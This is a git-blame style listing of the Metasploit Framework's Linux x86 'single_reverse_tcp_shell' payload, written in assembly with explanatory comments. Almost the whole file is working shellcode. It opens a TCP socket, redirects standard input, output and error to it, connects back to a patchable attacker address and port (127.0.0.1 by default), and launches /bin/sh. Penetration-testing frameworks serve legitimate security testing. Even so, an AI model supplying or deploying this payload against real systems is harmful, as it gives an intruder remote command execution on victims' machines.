2007-04-29 20:27:23 +00:00
|
|
|
;;
|
|
|
|
|
;
|
|
|
|
|
; Name: single_reverse_tcp_shell
|
|
|
|
|
; Version: $Revision: 1512 $
|
|
|
|
|
; License:
|
|
|
|
|
;
|
|
|
|
|
; This file is part of the Metasploit Exploit Framework
|
|
|
|
|
; and is subject to the same licenses and copyrights as
|
|
|
|
|
; the rest of this package.
|
|
|
|
|
;
|
|
|
|
|
; Description:
|
|
|
|
|
;
|
|
|
|
|
; Single reverse TCP shell.
|
|
|
|
|
;
|
|
|
|
|
; Meta-Information:
|
|
|
|
|
;
|
|
|
|
|
; meta-shortname=Linux Reverse TCP Shell
|
|
|
|
|
; meta-description=Connect back to the attacker and spawn a shell
|
|
|
|
|
; meta-authors=skape <mmiller [at] hick.org>
|
|
|
|
|
; meta-os=linux
|
|
|
|
|
; meta-arch=ia32
|
|
|
|
|
; meta-category=single
|
|
|
|
|
; meta-connection-type=reverse
|
|
|
|
|
; meta-name=reverse_tcp_shell
|
|
|
|
|
; meta-basemod=Msf::PayloadComponent::ReverseConnection
|
|
|
|
|
; meta-offset-lhost=0x1a
|
|
|
|
|
; meta-offset-lport=0x20
|
|
|
|
|
;;
|
|
|
|
|
BITS 32
|
|
|
|
|
GLOBAL _start
|
|
|
|
|
|
|
|
|
|
_start:
|
|
|
|
|
xor ebx, ebx
|
2012-09-12 18:44:00 -05:00
|
|
|
mul ebx
|
2007-04-29 20:27:23 +00:00
|
|
|
|
|
|
|
|
socket:
|
2012-09-12 18:44:00 -05:00
|
|
|
push ebx ; protocol = 0 = first that matches this type and domain, i.e. tcp
|
|
|
|
|
inc ebx ; 1 = SYS_SOCKET
|
|
|
|
|
push ebx ; type = 1 = SOCK_STREAM
|
|
|
|
|
push byte 0x2 ; domain = 2 = AF_INET
|
|
|
|
|
mov ecx, esp ; socketcall args
|
|
|
|
|
mov al, 0x66
|
2007-04-29 20:27:23 +00:00
|
|
|
int 0x80
|
|
|
|
|
xchg eax, ebx
|
|
|
|
|
|
2012-09-12 18:44:00 -05:00
|
|
|
; int dup2(int oldfd, int newfd);
|
2007-04-29 20:27:23 +00:00
|
|
|
dup:
|
2012-09-12 18:44:00 -05:00
|
|
|
pop ecx ; oldfd = 2, aka stderr
|
|
|
|
|
; newfd is in ebx, set above, and doesn't change until we're ready to call
|
|
|
|
|
; connect(2)
|
2007-04-29 20:27:23 +00:00
|
|
|
dup_loop:
|
2012-09-12 18:44:00 -05:00
|
|
|
mov al, 0x3f ; __NR_dup2
|
2007-04-29 20:27:23 +00:00
|
|
|
int 0x80
|
|
|
|
|
dec ecx
|
|
|
|
|
jns dup_loop
|
|
|
|
|
|
2012-09-12 18:44:00 -05:00
|
|
|
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
2007-04-29 20:27:23 +00:00
|
|
|
connect:
|
2012-09-12 18:44:00 -05:00
|
|
|
push dword 0x0100007f ; addr->sin_addr = 127.0.0.1
|
|
|
|
|
push 0xbfbf0002 ; addr->sin_port = 49087
|
|
|
|
|
; addr->sin_family = 2 = AF_INET
|
|
|
|
|
mov ecx, esp ; ecx = addr
|
|
|
|
|
mov al, 0x66 ; __NR_socketcall
|
|
|
|
|
push eax ; addrlen
|
|
|
|
|
push ecx ; addr
|
|
|
|
|
push ebx ; sockfd
|
|
|
|
|
mov bl, 0x3 ; 3 = SYS_CONNECT
|
|
|
|
|
mov ecx, esp ; socketcall args
|
2007-04-29 20:27:23 +00:00
|
|
|
int 0x80
|
|
|
|
|
|
2012-09-12 18:44:00 -05:00
|
|
|
; int execve(const char *filename, char *const argv[], char *const envp[]);
|
2007-04-29 20:27:23 +00:00
|
|
|
execve:
|
2012-09-12 18:44:00 -05:00
|
|
|
push edx ; NULL terminator for "/bin//sh"
|
2007-04-29 20:27:23 +00:00
|
|
|
push dword 0x68732f2f
|
|
|
|
|
push dword 0x6e69622f
|
2012-09-12 18:44:00 -05:00
|
|
|
mov ebx, esp ; filename
|
|
|
|
|
push edx ; NULL terminator for argv
|
|
|
|
|
push ebx ; pointer to "/bin//sh"
|
|
|
|
|
mov ecx, esp ; argv = pointer to pointer to "/bin//sh"
|
|
|
|
|
mov al, 0x0b ; __NR_execve
|
2007-04-29 20:27:23 +00:00
|
|
|
int 0x80
|
2012-09-12 18:44:00 -05:00
|
|
|
|
